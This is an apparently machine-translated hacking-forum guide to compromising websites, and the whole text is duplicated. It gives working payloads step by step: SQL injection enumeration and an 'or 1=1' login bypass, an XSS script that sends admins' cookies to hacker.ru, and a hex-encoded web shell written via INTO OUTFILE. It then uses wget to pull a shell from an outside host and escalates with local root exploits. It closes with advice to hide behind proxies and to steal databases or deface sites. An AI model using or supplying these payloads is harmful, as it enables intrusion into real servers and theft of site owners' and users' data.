Hacker
Professional
- Messages
- 1,041
- Reaction score
- 850
- Points
- 113
Part 1. PRELIMINARY EXAMINATION OF THE "PATIENT".
Chapter 1. Static or Dynamic?
Let's say we have a website _www.xxx.com. The first thing to do is to view its content.
There are two types of sites: those with static content or those with dynamic content. The second type is more common, because each time you create a new page is a lot of work, and if you need 100 such pages. The first type is used either by beginners(to create a personal page) or by highly protected companies in order to protect themselves from most hacking techniques, but, as they say, no one is insured. The second type is preferable for us, because due to its dynamic nature, it is difficult to track all errors that appear.
So, let's see which pages are present. Static content is characterized by pages with extensions*. htm, *. html (But this is not always the case, because you can hide scripts in PHP or ASP as HTML). You can recognize static pages by their number, the absence of parameters in the address bar, and direct clicks to other pages. Dynamic sites are characterized by the *.php, *.phtml extensions,
*. php3,*. asp,*. aspx,*. jsp are extensions to scripting languages.
Example:The site _http: / / www. xxx. com has 5 pages: index.html, masha.html, pasha.html, ih_lubov.html, about.htm. This site is most likely static... but a page like _http://www.yyy.com/index.html?page=sasha. htmlindicates that the site is dynamic.
Chapter 2. Who else is there?
It is possible that the site under review consists of only 3-4 static pages and there is no way to find errors in them. In this case, the fact that several sites can be hosted on the same server may help us. Some of them may have dynamic content or open access to admin panels(which is very rare). Special services will help you find such neighbors on <url>. Here are the addresses of three of them:
Next, you can check the server for other services, such as FTP, Telnet, SSH, and HTTPS (secure HTTP). Sometimes it happens that the admin completely protected their content, but forgot about the FTP service and left it open.
Example:The site _http://www.xxx.com is well protected, but there is another site _http://www.yyy.com sitting on this IP (as we learned from
the aforementioned services). It is also well protected, but by typing _ftp://www.yyy.com in the address bar, we can see all the site content and can fill in a shell (a special script that allows you to execute various commands in the server system). In general, filling the shell is the penultimate step when getting full access to the server.
Chapter 3. Closer to the body.
So, knowing a lot about the site, what else can you do? You can scan the" hidden " content of the site to get the necessary information. Many admins want their brainchild to be popular with people, so they try in every possible way to attract search engines to themselves. This is done so that a person in search of information goes to the site through search servers (yandex.ru, rambler.ru, google.com,
msn.com ). These systems have their own "information getters" -robots that follow all the links and write everything down somewhere, and then give it out when you click on the SEARCH button. To prevent these robots from climbing where they shouldn't, they often create a special file in the root of the site with instructions for the bot. It's called robots.txt. Sometimes you can find a lot of interesting information in it.
You can also scan the entire site using special tools such as NIKTO, Xspyder, and others. (All of them can be found on the Internet). They will help you find hidden files and folders.
Example: By address _http://www.xxx.com/robots.txt we can see that the /forum folder exists, although there is no mention of it on the site itself. Go to the address _http://www.xxx.com/forum and see the forum just made, and after scanning the site with a scanner, we find
admin panel without authorization - _http://www.xxx.com / admin.
Part 2. ATTACK.
Chapter 1. Before the attack.
When viewing a site, an experienced eye will always notice whether it is a self-made site or whether it is built on some popular engine. And for these engines, almost all vulnerabilities are known (with the exception of the so-called private-sploit, which are known only to a narrow circle of people and cost a lot of money). A beginner should pay attention to the following things:
- The inscription Powered by xxxxxxxx says that the name of the engine is xxxxxxxx;
- The layout style is the same as that of the yyyyyyy engine;
- The name of the scripts is the same as that of the zzzzzzz engine.
If you understand which engine manages the site, then you need to look for vulnerabilities yourself by downloading the same one, or if you don't have enough knowledge, then use specialized sites such as XakNet.ru, AntiChat.ru, SecurityLab.ru, milw0rm.com. There in special sections
there is information about almost all the vulnerabilities of well – known engines, and there are also sploits-special scripts that automatically hack the site (they are usually used either by beginners for ignorance, or by pros to simplify the hacking process). For self-written sites, there are several types of attacks on web content, the most common ones are:
- PHP injections;
- SQL injections;
- XSS attacks.
Chapter 2. PHP-injection.
PHP injections are a type of attack in which the attacker outputs the one that he needs instead of the intended page. Availability of this information
vulnerabilities are typical for sites that have an address bar that looks something like this – _http://www.xxx.com/index.php?page=sasha.php - this is an ideal PHP injection, in which the script does not check(in most cases) either the file name or its extension. There are injections in which the file extension is appended by the script itself - _http://www.xxx.com/index.php?page=sasha-will display the page sasha.html.
Chapter 3. SQL injection.
Many sites store important information in databases. MySQL and MSSQL databases are considered the most popular on the Internet. The site can use queries to access the database, it will give a response, and the script will give it in the desired format to the user. So, if we change the query in some way, we can get the result we need. You can check for SQL injection by substituting the "'"character in the parameter, which in databases is a request limiter, i.e. if there is an address _http://www. xxx. com/index. php?id=365and we substitute 'after the parameter 365 - _http://www. xxx.com/index.
if we get an error instead of displaying information on the screen, then this indicates the presence of SQL injection. Further – it all depends on the type and version of the database. I will not describe all the subspecies of SQL attacks here, because the volume of the article will immediately increase significantly, but I will be happy to tell you where you can read about it in detail, because there are many articles on this type of vulnerability.
Example: The site's address bar looks like this: _http://www.xxx.com/index. php?id=365. We substitute ‘ - _http://www.xxx.com/index.php?id=365’
- we get an error like " MySQL Error: ...". We select the number of columns using " +order+by+XX/*”, where XX is a number that means the column number:
_http://www.xxx.com/index.php?id=365 order by 50 / * - there is an error…
_http://www.xxx.com/index.php?id=365 order by 25 / * - there is an error…
_http://www.xxx.com/index.php?id=365 order by 15 / * - no error, so the number of columns is between 15 and 25. Then, in the same way, we find that the number of columns is 16.
_http://www.xxx.com/index.php? id=-1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15, 16/* - outputs 2,4,6,8,15. Substituting user(),
version (), database() in place of the output numbers and get information about the user, version, and name of the database used.
Then it depends on the data we want to get… Also, if a database is used to log in to closed sections of the site, we can bypass authorization by using a construct like ’ ' or 1=1/*, substituting it for the username and password.
Chapter 4. XSS attack.
This type of attack is used to get admins cookies. If you enter a construct like <script>ALERT('Admin-FUCK')(<script></script>) in a field, such as "FULL NAME" in the guestbook, and then view your entry, a window with the inscription "Admin – FUCK" appears on the screen, this indicates the presence of an XSS vulnerability. If you insert a special code, then when the admin views this message, his cookies will come to you on the sniffer, and they contain the password or its hash, or the session…
Example: The site _http://www.xxx.com has a guestbook in which the name field is subject to XSS attack: insert in this field
<script>ALERT ('Admin-FUCK');<script></script> and see "Admin-FUCK" on the screen. Now insert " < script>img = new Image();
img.src=http://hacker.ru/snf.jpg? "+document. cookie;< / script> " and wait for the admin to view your pussy... After a while we get an MD5 hash of his password on the sniffer. We decipher on http://HashCracking.info or similar services. Then go to the admin panel…
Part 3. SHELL, RUTH.
Chapter 1. Shell-shell-la-fam.
So, we are in the admin panel, or we have root access to the database, or PHP-inj of the remote file, or FTP-access to the site, what's next. And then more
simply:
1) FTP access or ADMIN PANEL. Just fill in the shell script you like and go to the next chapter.
2) PHP-inj. We upload the shell script to some free hosting service, for example, narod.ru, and include it something like this-_http://www.xxx.com/index.php?page=http://site.narod.ru/shell.php then we upload the shell directly to the site.
3) Root MySQL – if the quotation mark is not filtered, then you can fill in the shell using the request _http://www.xxx.com/index.php?id=-1 union select 1,2,3,4,5,6,7,8, 0x3C3F2073797374656D28245F4745545B2763275D293B203F 3E,10,11,12,13,14,15,16+FROM+mysql. user+INTO+OUTFI
LE+'/home/www/shell.php'/*, where 0x3C3F2073797374656D28245F4745545B2763275D293B203F 3E is the encoded expression
system($_GET['c']); ?> , which allows executing commands on the server. Next, fill in a more convenient shell with the command
_http://www.xxx.com?c=wget -O shell.php _http://site.narod.ru/shell.php.
Chapter 2. Root.
Shell Bay we can now execute commands on the server, and the first command will be id, which shows your rights in the system, and they are usually modest. If you want more, then we'll see what OS is running on the server (the uname –a command). Under this version, we search for a split on the site, compile it, run it(how to do this is described either at the beginning of the split itself, or in articles) and root! Goal achieved.
Part 4. ARE YOU SAFE?
Every crime is punishable, so you need to protect yourself in advance-proxies should become your best friends. Read about IT, don't be lazy…
Part 5. BONUS.
What you will do – either just pick up the database, or deface the site, or drive traffic, or maybe put a proxy for users-is up to you.
Chapter 1. Static or Dynamic?
Let's say we have a website _www.xxx.com. The first thing to do is to view its content.
There are two types of sites: those with static content or those with dynamic content. The second type is more common, because each time you create a new page is a lot of work, and if you need 100 such pages. The first type is used either by beginners(to create a personal page) or by highly protected companies in order to protect themselves from most hacking techniques, but, as they say, no one is insured. The second type is preferable for us, because due to its dynamic nature, it is difficult to track all errors that appear.
So, let's see which pages are present. Static content is characterized by pages with extensions*. htm, *. html (But this is not always the case, because you can hide scripts in PHP or ASP as HTML). You can recognize static pages by their number, the absence of parameters in the address bar, and direct clicks to other pages. Dynamic sites are characterized by the *.php, *.phtml extensions,
*. php3,*. asp,*. aspx,*. jsp are extensions to scripting languages.
Example:The site _http: / / www. xxx. com has 5 pages: index.html, masha.html, pasha.html, ih_lubov.html, about.htm. This site is most likely static... but a page like _http://www.yyy.com/index.html?page=sasha. htmlindicates that the site is dynamic.
Chapter 2. Who else is there?
It is possible that the site under review consists of only 3-4 static pages and there is no way to find errors in them. In this case, the fact that several sites can be hosted on the same server may help us. Some of them may have dynamic content or open access to admin panels(which is very rare). Special services will help you find such neighbors on <url>. Here are the addresses of three of them:
DOMAINSDB.NET - Reverse IP & NS Lookup Tool
DomainsDB.net
Next, you can check the server for other services, such as FTP, Telnet, SSH, and HTTPS (secure HTTP). Sometimes it happens that the admin completely protected their content, but forgot about the FTP service and left it open.
Example:The site _http://www.xxx.com is well protected, but there is another site _http://www.yyy.com sitting on this IP (as we learned from
the aforementioned services). It is also well protected, but by typing _ftp://www.yyy.com in the address bar, we can see all the site content and can fill in a shell (a special script that allows you to execute various commands in the server system). In general, filling the shell is the penultimate step when getting full access to the server.
Chapter 3. Closer to the body.
So, knowing a lot about the site, what else can you do? You can scan the" hidden " content of the site to get the necessary information. Many admins want their brainchild to be popular with people, so they try in every possible way to attract search engines to themselves. This is done so that a person in search of information goes to the site through search servers (yandex.ru, rambler.ru, google.com,
msn.com ). These systems have their own "information getters" -robots that follow all the links and write everything down somewhere, and then give it out when you click on the SEARCH button. To prevent these robots from climbing where they shouldn't, they often create a special file in the root of the site with instructions for the bot. It's called robots.txt. Sometimes you can find a lot of interesting information in it.
You can also scan the entire site using special tools such as NIKTO, Xspyder, and others. (All of them can be found on the Internet). They will help you find hidden files and folders.
Example: By address _http://www.xxx.com/robots.txt we can see that the /forum folder exists, although there is no mention of it on the site itself. Go to the address _http://www.xxx.com/forum and see the forum just made, and after scanning the site with a scanner, we find
admin panel without authorization - _http://www.xxx.com / admin.
Part 2. ATTACK.
Chapter 1. Before the attack.
When viewing a site, an experienced eye will always notice whether it is a self-made site or whether it is built on some popular engine. And for these engines, almost all vulnerabilities are known (with the exception of the so-called private-sploit, which are known only to a narrow circle of people and cost a lot of money). A beginner should pay attention to the following things:
- The inscription Powered by xxxxxxxx says that the name of the engine is xxxxxxxx;
- The layout style is the same as that of the yyyyyyy engine;
- The name of the scripts is the same as that of the zzzzzzz engine.
If you understand which engine manages the site, then you need to look for vulnerabilities yourself by downloading the same one, or if you don't have enough knowledge, then use specialized sites such as XakNet.ru, AntiChat.ru, SecurityLab.ru, milw0rm.com. There in special sections
there is information about almost all the vulnerabilities of well – known engines, and there are also sploits-special scripts that automatically hack the site (they are usually used either by beginners for ignorance, or by pros to simplify the hacking process). For self-written sites, there are several types of attacks on web content, the most common ones are:
- PHP injections;
- SQL injections;
- XSS attacks.
Chapter 2. PHP-injection.
PHP injections are a type of attack in which the attacker outputs the one that he needs instead of the intended page. Availability of this information
vulnerabilities are typical for sites that have an address bar that looks something like this – _http://www.xxx.com/index.php?page=sasha.php - this is an ideal PHP injection, in which the script does not check(in most cases) either the file name or its extension. There are injections in which the file extension is appended by the script itself - _http://www.xxx.com/index.php?page=sasha-will display the page sasha.html.
Chapter 3. SQL injection.
Many sites store important information in databases. MySQL and MSSQL databases are considered the most popular on the Internet. The site can use queries to access the database, it will give a response, and the script will give it in the desired format to the user. So, if we change the query in some way, we can get the result we need. You can check for SQL injection by substituting the "'"character in the parameter, which in databases is a request limiter, i.e. if there is an address _http://www. xxx. com/index. php?id=365and we substitute 'after the parameter 365 - _http://www. xxx.com/index.
if we get an error instead of displaying information on the screen, then this indicates the presence of SQL injection. Further – it all depends on the type and version of the database. I will not describe all the subspecies of SQL attacks here, because the volume of the article will immediately increase significantly, but I will be happy to tell you where you can read about it in detail, because there are many articles on this type of vulnerability.
Example: The site's address bar looks like this: _http://www.xxx.com/index. php?id=365. We substitute ‘ - _http://www.xxx.com/index.php?id=365’
- we get an error like " MySQL Error: ...". We select the number of columns using " +order+by+XX/*”, where XX is a number that means the column number:
_http://www.xxx.com/index.php?id=365 order by 50 / * - there is an error…
_http://www.xxx.com/index.php?id=365 order by 25 / * - there is an error…
_http://www.xxx.com/index.php?id=365 order by 15 / * - no error, so the number of columns is between 15 and 25. Then, in the same way, we find that the number of columns is 16.
_http://www.xxx.com/index.php? id=-1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15, 16/* - outputs 2,4,6,8,15. Substituting user(),
version (), database() in place of the output numbers and get information about the user, version, and name of the database used.
Then it depends on the data we want to get… Also, if a database is used to log in to closed sections of the site, we can bypass authorization by using a construct like ’ ' or 1=1/*, substituting it for the username and password.
Chapter 4. XSS attack.
This type of attack is used to get admins cookies. If you enter a construct like <script>ALERT('Admin-FUCK')(<script></script>) in a field, such as "FULL NAME" in the guestbook, and then view your entry, a window with the inscription "Admin – FUCK" appears on the screen, this indicates the presence of an XSS vulnerability. If you insert a special code, then when the admin views this message, his cookies will come to you on the sniffer, and they contain the password or its hash, or the session…
Example: The site _http://www.xxx.com has a guestbook in which the name field is subject to XSS attack: insert in this field
<script>ALERT ('Admin-FUCK');<script></script> and see "Admin-FUCK" on the screen. Now insert " < script>img = new Image();
img.src=http://hacker.ru/snf.jpg? "+document. cookie;< / script> " and wait for the admin to view your pussy... After a while we get an MD5 hash of his password on the sniffer. We decipher on http://HashCracking.info or similar services. Then go to the admin panel…
Part 3. SHELL, RUTH.
Chapter 1. Shell-shell-la-fam.
So, we are in the admin panel, or we have root access to the database, or PHP-inj of the remote file, or FTP-access to the site, what's next. And then more
simply:
1) FTP access or ADMIN PANEL. Just fill in the shell script you like and go to the next chapter.
2) PHP-inj. We upload the shell script to some free hosting service, for example, narod.ru, and include it something like this-_http://www.xxx.com/index.php?page=http://site.narod.ru/shell.php then we upload the shell directly to the site.
3) Root MySQL – if the quotation mark is not filtered, then you can fill in the shell using the request _http://www.xxx.com/index.php?id=-1 union select 1,2,3,4,5,6,7,8, 0x3C3F2073797374656D28245F4745545B2763275D293B203F 3E,10,11,12,13,14,15,16+FROM+mysql. user+INTO+OUTFI
LE+'/home/www/shell.php'/*, where 0x3C3F2073797374656D28245F4745545B2763275D293B203F 3E is the encoded expression
system($_GET['c']); ?> , which allows executing commands on the server. Next, fill in a more convenient shell with the command
_http://www.xxx.com?c=wget -O shell.php _http://site.narod.ru/shell.php.
Chapter 2. Root.
Shell Bay we can now execute commands on the server, and the first command will be id, which shows your rights in the system, and they are usually modest. If you want more, then we'll see what OS is running on the server (the uname –a command). Under this version, we search for a split on the site, compile it, run it(how to do this is described either at the beginning of the split itself, or in articles) and root! Goal achieved.
Part 4. ARE YOU SAFE?
Every crime is punishable, so you need to protect yourself in advance-proxies should become your best friends. Read about IT, don't be lazy…
Part 5. BONUS.
What you will do – either just pick up the database, or deface the site, or drive traffic, or maybe put a proxy for users-is up to you.
